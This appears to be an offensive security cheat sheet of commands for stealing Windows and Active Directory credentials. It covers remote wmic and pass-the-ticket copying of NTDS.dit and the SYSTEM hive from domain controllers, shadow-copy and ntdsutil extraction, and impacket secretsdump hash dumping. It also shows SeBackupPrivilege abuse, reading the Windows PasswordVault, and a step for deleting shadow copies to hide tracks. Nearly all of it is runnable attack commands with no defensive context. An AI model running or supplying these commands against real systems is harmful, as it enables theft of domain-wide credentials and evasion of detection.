This files should be located in C:\windows\system32\config\SAM and C:\windows\system32\config\SYSTEM. But you cannot just copy them in a regular way because they are protected.
Requires DC compromise.
We need 2 files:
NTDS.dit
SYSTEM file .Bootkey [Stored in registry HKLM\SYSTEM]
SYSTEM file contains the Boot Key that will be needed to decrypt the NTDS.dit file.
#Remotely with DA clear-text password
wmic /node:<DC_hostname> /user:<domain\Users> /password:<pass> process call create "cmd /c vssadmin create shadow /for=C: 2>&1 > c:\vss.log"
wmic /node:<DC_hostname> /user:<domain\Users> /password:<pass> process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumneShadowCopy1\Windows\NTDS\NTDS.dit C:\windows\temp\NTDS.dit 2>&1 > c:\vss2.log"
wmic /node:<DC_hostname> /user:<domain\Users> /password:<pass> process call create "cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumneShadowCopy1\Windows\System32\config\SYSTEM C:\windows\temp\SYSTEM.hive 2>&1 > c:\vss2.log"
#Remotely with DA Pass-the-ticket
wmic /authority:"Kerberos:<domain\DC-hostname>" /node:<DC-Hostname> process call create "..<Same as above>.."
#Remotely via PSRemote
Powersploit's Invoke-NinjaCopy
#NTDSUtil.exe. Access to DC is required to execute. Tool used by Sysadmins.
Create an "install from media" makes a copy of NTDS.dit & SYSTEM registry hive:
ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
#Create a volume shadow copy
vssadmin create shadow /for=C:
#Retrieve Ntds.dit file from Volume Shadow Copy
copy <Shadow directory>\ntds.dit c:\Temp\ntds.dit
#Copy SYSTEM & SAM Hive file from registry.
reg.exe save HKLM\SAM sam.bak
reg.exe save HKLM\SYSTEM system.bak
#Delete tracks
vssadmin delete shadows /shadow={<Shadow Copy ID>}
#With DA privs, save NTDS.dit to C:\Temp
powershell "ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\temp' q q"
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
#Add -history for password history
secretsdump.py -sam SAM -system SYSTEM LOCAL
secretsdump.py -sam SAM -security SECURITY -system SYSTEM LOCAL
#Remotely extract credentials
sudo python3 secretsdump.py <domain>/<username>:'<pass>'@<IP>
impacket-secretsdump -just-dc-ntlm offense/administrator@10.0.0.6
#Create a file called cmd in C:\windows\temp\
#cmd Contents:
set context persistent nowritersadd volume c: alias tempcreateexpose %temp% h:exit
#Create a shadow volume accessible via the H:
diskshadow /s cmd
# upload SeBackupPrivilegeUtils.dll and SeBackupPrivilegeCmdLets.dll
#https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Debug
import-module .\SeBackupPrivilegeCmdLets.dll
import-module .\SeBackupPrivilegeUtils.dll
Copy -FileSeBackupPrivilege h:\windows\ntds\ntds.dit c:\windows\temp\NTDS -Overwrite
Copy -FileSeBackupPrivilege h:\windows\system32\config\SYSTEM c:\windows\temp\SYSTEM -Overwrite
With SeBackupPrivilege, we can create a backup of c:\windows\ntds and restore ntds.dit without the ACLs. Refer ACL Abuse section for more details.
#Load the Credentials and PasswordVault assemblies:
[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]
#Instantiate an object of the PasswordVault class to work with:
$vault = New-Object Windows.Security.Credentials.PasswordVault
#Read contents of the vault
$vault.RetrieveAll() | % { $_.RetrievePassword();$_ }